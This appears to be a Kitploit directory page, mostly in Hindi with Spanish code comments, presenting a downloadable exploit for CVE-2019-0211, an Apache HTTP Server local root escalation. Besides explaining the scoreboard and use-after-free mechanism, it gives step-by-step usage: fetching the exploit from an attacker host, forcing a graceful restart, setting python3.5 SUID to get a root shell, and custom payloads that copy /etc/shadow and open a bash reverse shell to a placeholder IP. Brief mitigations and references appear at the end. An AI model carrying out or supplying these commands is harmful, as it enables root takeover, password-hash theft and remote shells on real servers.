Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0211-exploit | Kitploit
उपकरण/GitHubGitHub/jeanback1/cve-2019-0211-exploit
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubjeanback1/cve-2019-0211-exploit

CVE-2019-0211-exploit

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-0211 — Apache HTTP Server स्थानीय विशेषाधिकार वृद्धि (CARPE DIEM)

विवरण

CVE-2019-0211 एक स्थानीय विशेषाधिकार वृद्धि भेद्यता है जो Apache HTTP Server के 2.4.17 और 2.4.38 संस्करणों को mod_prefork और mod_php (या PHP-FPM) के साथ प्रभावित करती है।

यह भेद्यता एक हमलावर को www-data के रूप में शेल होने पर PHP में Use-After-Free (UAF) और Apache के scoreboard के भ्रष्टाचार के संयोजन के माध्यम से root तक विशेषाधिकार बढ़ाने की अनुमति देती है। जब Apache एक graceful restart करता है (उदाहरण के लिए, सुबह 6:25 बजे logrotate के माध्यम से), यह विशेषाधिकार छोड़ने से पहले child_init() को निष्पादित करता है। यदि हम इस फ़ंक्शन के पॉइंटर को भ्रष्ट करने में सफल होते हैं, तो हम Apache को root के रूप में एक मनमाना कमांड निष्पादित करा सकते हैं।

CVSS 3.1: 7.8 (उच्च) — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


तकनीकी विवरण

तंत्र

Apache scoreboard नामक एक साझा मेमोरी क्षेत्र का उपयोग करता है जहां प्रत्येक कार्यकर्ता (worker) प्रक्रिया में process_score संरचना होती है जिसमें prefork_child_bucket की ओर एक bucket पॉइंटर होता है। इस bucket में एक apr_proc_mutex_t होता है जिसमें फ़ंक्शन पॉइंटर (meth->child_init()) होते हैं।

जब Apache एक graceful restart करता है (सुबह 6:25 बजे logrotate द्वारा प्राकृतिक ट्रिगर), तो यह विशेषाधिकार छोड़ने से पहले child_init() को कॉल करता है। एक्सप्लॉयट:

  1. DateInterval ऑब्जेक्ट्स और JSON serialization में हेरफेर करके PHP में UAF उत्पन्न करता है
  2. मेमोरी में मनमाने ढंग से पढ़ने/लिखने की प्रिमिटिव प्राप्त करता है
  3. scoreboard का पता लगाने के लिए /proc/self/maps पढ़ता है (/dev/zero में SHM)
  4. Apache की मेमोरी में all_buckets संरचना ढूंढता है
  5. Buckets को एक payload के साथ अधिलेखित करता है जो meth->child_init() को system() की ओर पुनर्निर्देशित करता है
  6. अगले restart में, Apache payload को root के रूप में निष्पादित करता है

एक्सप्लॉयट

मूल लेखक

Charles Fol — @cfreal_

मूल ब्लॉगपोस्ट: CARPE DIEM — CVE-2019-0211 Apache Local Root

आवश्यकताएँ

  • Apache HTTP Server 2.4.17 – 2.4.38 mod_php (PHP 7.x) के साथ
  • सर्वर पर www-data के रूप में शेल
  • Apache द्वारा सर्व किए गए निर्देशिका में .php फ़ाइल लिखने की क्षमता

उपयोग

root@kitploit:~
# 1. Subir el exploit al servidor vulnerable
# Desde tu máquina atacante:
python3 -m http.server 8080
# En el servidor (como www-data):
cd /var/www/html
wget http://TU_IP:8080/carpediem.php

# 2. Ejecutar el exploit
curl http://localhost/carpediem.php

# 3. Esperar a que Apache haga graceful restart
# Opción A) Esperar a las 6:25 AM (logrotate automático)
# Opción B) Forzar logrotate si tienes permisos:
sudo /usr/sbin/logrotate /etc/logrotate.conf --force

# 4. Verificar que python3.5 ahora es SUID root
ls -la /usr/bin/python3.5
# Output esperado: -rwsr-sr-x 2 root root ...

# 5. Escalar a root
python3.5 -c 'import os; os.setuid(0); os.system("/bin/bash")'

कस्टम पेलोड

आप cmd पैरामीटर का उपयोग करके root के रूप में निष्पादित होने वाले कमांड को बदल सकते हैं:

root@kitploit:~
# Ejemplo: hacer una copia de /etc/shadow
curl "http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/"

# Ejemplo: reverse shell
curl "http://localhost/carpediem.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/TU_IP/PUERTO+0>%261'"

सफलता दर

Workers

अधिक workers = अधिक सफलता दर।


शमन

  • Apache HTTP Server को ≥ 2.4.39 संस्करण में अपडेट करें
  • MPM prefork से MPM event पर माइग्रेट करें (scoreboard में हमले की सतह कम होती है)
  • hidef या AppArmor/SELinux के माध्यम से /proc/self/maps तक पहुंच प्रतिबंधित करें

संदर्भ

  • NVD — CVE-2019-0211
  • CARPE DIEM Blogpost — Charles Fol
  • GitHub पर Exploit — cfreal/exploits
  • Exploit-DB #46676
  • Apache सुरक्षा सलाह
टूल डाउनलोड करें
फ़ील्डमान
CVECVE-2019-0211
उत्पादApache HTTP Server
प्रभावित संस्करण2.4.17 – 2.4.38
प्रकारस्थानीय विशेषाधिकार वृद्धि (CWE-269)
आवश्यकताwww-data के रूप में शेल, mod_php के साथ Apache, MPM prefork/worker/event
CVSS 3.17.8 उच्च
पैचApache 2.4.39
सफलता
प्रयास
विफलताएँ
5 (डिफ़ॉल्ट)87%17726
889%608
1095%704